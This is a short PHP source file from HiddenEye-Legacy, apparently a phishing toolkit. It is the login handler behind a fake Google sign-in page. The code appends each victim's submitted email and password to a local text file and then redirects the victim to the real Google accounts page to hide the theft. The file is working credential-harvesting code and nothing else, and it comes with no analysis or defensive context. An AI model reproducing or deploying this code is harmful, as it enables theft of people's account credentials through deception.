HiddenEye-Legacy/WebPages/google_advanced_web/login.php

7 lines
215 B
PHP

<?php
include 'base.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://accounts.google.com');
exit();